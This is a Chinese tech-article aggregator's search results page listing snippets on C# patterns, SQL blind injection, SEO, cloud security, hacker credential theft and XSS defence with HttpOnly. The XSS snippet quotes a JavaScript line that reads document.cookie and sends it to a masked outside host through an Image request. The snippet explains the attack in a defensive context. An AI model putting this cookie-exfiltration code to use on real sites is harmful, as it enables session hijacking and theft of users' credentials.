码迷,mamicode.com
首页 >  
搜索关键字:arp协议 攻击 交换机工作原理    ( 8901个结果
C#之装饰者
IronMan之装饰者前言上一篇的文章我们讲到要给"IronMan"配备"武器",并且还使用了"武器",效果还是不错的,对于多种环境、多种攻击方式的"武器"使用,我们已经掌握了。有的朋友没有看过上一篇文章,那也没关系,此篇的重点不会涉及到上一篇的内容。好吧,废话不多说,直接进入..
分类:其他好文   时间:2014-05-27 04:05:29    阅读次数:339
C#的委托是什么?
举个例子,某人有三子,让他们各自带一样东西出门,并带回一头猎物。可以理解为一种父亲对儿子的委托。 在学C时,一定会接触到各种各样的指针。正是指针的随意使用,导致了现在溢出攻击的泛滥。 那么在C#里面,针对这种现象进行了改进--委托。委托的作用类似于方法指针,它指向一个方法,并且提供用户程序使用。但是...
分类:其他好文   时间:2014-05-27 02:22:28    阅读次数:136
(转)SQL盲注攻击的简单介绍
转:http://hi.baidu.com/duwang1104/item/65a6603056aee780c3cf29681 简介 1.1 普通SQL注入技术概述 目前没有对SQL注入技术的标准定义,微软中国技术中心从2个方面进行了描述[1]: (1) 脚本注入式的攻击 (2) 恶意用户输...
分类:数据库   时间:2014-05-24 05:29:53    阅读次数:436
站内优化之页面头部代码规范化的重要性
头部代码很重要!错一点都会导致百度抓取出现问题说到代码就要谈到模板了,我相信很多的人也好,企业也好,做的网站都是复制别人的代码居多,这就产生一个问题,模板代码严重相似,特别是经过2013年年底泛站群攻击以后,百度立既改变了算法,把大量相似的代码网站例入垃圾网站,这给一些小网站造成很大的麻烦,每天更新,发外链,比别人复出一倍,排名却仍然停留不前,你有想过是否能从本文找到一些原因吗,如果能给你一些启发...
分类:其他好文   时间:2014-05-22 12:11:19    阅读次数:176
利用HttpOnly来防御xss攻击
xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。 如下js获取cookie信息:  url=document.top.location.href;  cookie=document.cookie;  c=new Image();  c.src=’http://www.******.c...
分类:其他好文   时间:2014-05-22 08:24:14    阅读次数:273
UVA 10237 - Bishops(递推)
UVA 10237 - Bishops 题目链接 题意:问一个n * n棋盘能放k个主教(攻击斜线)的方案数。 思路:递推,首先考虑一个问题,在一个n?n棋盘上,放k个车的方案数。 那么设dp[i][j]为i行用了j个车的方案数,由于每行只能放一个车,那么考虑i行放不放车,如果放车,那么能放的位置有n?(j?1)个位置,为dp[i?1][j?1]?(n?(j?1))。 如果不放那...
分类:其他好文   时间:2014-05-22 07:57:05    阅读次数:148
CWS,XenApp和XenDesktop的未来
最近一段时间,V公司不断发起对Citrix的攻击,最近一篇文章甚至把一篇BrianMadden博文后面的一些吊丝的回复拿出来说事,似乎想通过一些无关重要的读者评论来达到打击Citrix的目的。人家作者都没说什么,难道一帮吊丝来黑Citrix就能证明Citrix不行么?还不知道这些吊丝是不是V公..
分类:移动开发   时间:2014-05-21 00:47:50    阅读次数:367
【NOI2001】炮兵阵地
【题目描述】司令部的将军们打算在N*M的网格地图上部署他们的炮兵部队。一个N*M的地图由N行M列组成,地图的每一格可能是山地(用“H” 表示),也可能是平原(用“P”表示),如下图。在每一格平原地形上最多可以布置一支炮兵部队(山地上不能够部署炮兵部队);一支炮兵部队在地图上的攻击 范围如图中黑色区域...
分类:其他好文   时间:2014-05-20 09:12:23    阅读次数:214
云计算软件安全基础
当组织把关键信息委托给无法直接控制的、分散在各地的云平台时,安全是其首先要考虑的因素。在SDLC中,将安全贯穿到云软件开发的每个环节,可以在很大程度上降低云被攻击的范围,SDLC中与云安全相关的有信息生命周期管理、应用程序安全、存储,具体见csaguidev3.0 接下来的内容为: 0x01...
分类:其他好文   时间:2014-05-19 16:01:37    阅读次数:344
黑客获取数据信息的目的和进攻手段
进入微软、亚马逊,谷歌等美国IT企业工作人才项目,起薪40万,百度搜索(MUMCS) 黑客使用进攻取证获取凭证,如用户名和密码。这些都允许他们访问敏感数据同时能够隐瞒自己的身份,以拖延攻击时被发现的时间并避免暴露自己的行踪。黑客寻找这种以半永久记忆的形式获取存在如 RAM 内存或交换文件中的动态/非静态数据。一旦黑客获得暂时存储在明文中的用户 ID 和密码,他们就可以进入下一个等级的...
分类:其他好文   时间:2014-05-18 10:59:34    阅读次数:283
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!